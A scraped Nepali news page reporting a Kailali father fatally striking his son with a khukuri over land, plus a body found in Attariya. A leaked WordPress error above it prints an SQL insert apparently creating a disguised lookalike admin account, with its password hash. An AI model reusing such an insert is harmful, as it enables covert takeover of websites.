WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8XeId.qD7pHfdBmN8cKP3LobP64cA1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 06:13:26', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
कैलालीमा बाबुले प्रहार गरेको खुकुरीबाट छोराको मृत्यु – Gaule Khabar

कैलालीमा बाबुले प्रहार गरेको खुकुरीबाट छोराको मृत्यु

कैलालीमा बाबुले प्रहार गरेको खुकुरीबाट छोराको मृत्यु

कैलाली, माघ २६ –

कैलालीको घोडाघोडी नगरपालिकामा ७२ वर्षीय बुबाले खुकुरी प्रहार गरेपछि छोराको मृत्यु भएको छ । गएराति ११।३० बजे घोडाघोडी नगरपालिका–१ रामपुरका बाबु राजमली रोकायको खुकुरी प्रहारबाट उहाँका ४३ वर्षीय छोरा कर्ण रोकायको मृत्यु भएको जिल्ला प्रहरी कार्यालय कैलालीले जनाएको छ ।

बाबु छोराबीच जग्गाको विषयमा विवाद हँुदा बाउले प्रहार गरेको खुकुरीबाट छोरा घाइते भएका थिए । घाइते छोरालाई उपचारको लागि घोडाघोडी अस्पताल पु¥याइएको थियो भने घोडाघोडी अस्पतालले थप उपचारका लागि कोहलपुर मेडिकल कलेजमा पठाउँदा उपचारकै क्रममै मृत्यु भएको जिल्ला प्रहरी कार्यालयले जनाएको छ ।

बाबु रोकायलाई इलाका प्रहरी कार्यालय सुखडले नियन्त्रणमा लिएको प्रहरीले जानकारी दिएको छ । यस्तै कैलालीको अत्तरिया नगरपालिकाको राजमार्गबाट करिब २० मिटर उत्तरतर्फ एकजना मृत अवस्थामा फेला परेका छन् ।

मृत अवस्थामा फेला परेका ३३ वर्षीय रमेश ऐरको कुनै घाउ चोट नरहेको र मुखबाट बान्ता गरेको अवस्थामा शव फेला परेको प्रहरीले जनाएको छ । मृतक ऐरको सेती अञ्चल अस्पतालमा शव परीक्षण गरी आफन्तको जिम्मा लगाएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका